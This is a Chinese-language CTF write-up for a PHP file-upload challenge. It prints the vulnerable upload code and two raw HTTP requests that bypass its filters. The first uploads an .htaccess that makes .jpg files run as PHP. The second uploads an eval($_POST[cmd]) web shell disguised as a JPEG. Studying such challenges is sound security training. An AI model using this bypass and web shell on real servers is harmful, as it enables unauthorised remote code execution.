题目附件如下。
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
$target_path = getcwd() . "/upload/" . md5($_SESSION['user']);
$t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];
if(preg_match("/ph/i", strtolower($uploaded_ext))){
die("后缀名不能有ph!");
}
else{
if ((($_FILES["uploaded"]["type"] == "
") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
$content = file_get_contents($uploaded_tmp);
if(preg_match("/\<\?/i", $content)){
die("诶,别蒙我啊,这标志明显还是php啊");
}
else{
mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
move_uploaded_file($uploaded_tmp, $t_path);
echo "{$t_path} succesfully uploaded!";
}
}
else{
die("上传类型也太露骨了吧!");
}
}
}
?>
这里可以看到,用户上传的文件后缀名不能存在 ph,并且要求 Content-Type 仅为 image/jpeg 或 image/pjpeg,并且要求上传内容的大小小于 2048。其次之外,还匹配了 <? 符号。
因此,直接先上传 Apache 的配置文件 .htaccess,设置 .jpg 结尾的文件当作 PHP 文件进行解析,随后上传一个 .jpg 图片马,即可 Getshell。
POST / HTTP/1.1
Host: 4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Length: 359
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT7cVggBJBWlA2EjZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=09c3fcdd0d40284b5528d0dafe4a0bb2
Connection: close
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg
<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryT7cVggBJBWlA2EjZ--
POST / HTTP/1.1
Host: 4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Length: 332
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT7cVggBJBWlA2EjZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=09c3fcdd0d40284b5528d0dafe4a0bb2
Connection: close
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg
<script language="php">@eval($_POST[cmd])</script>
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryT7cVggBJBWlA2EjZ--
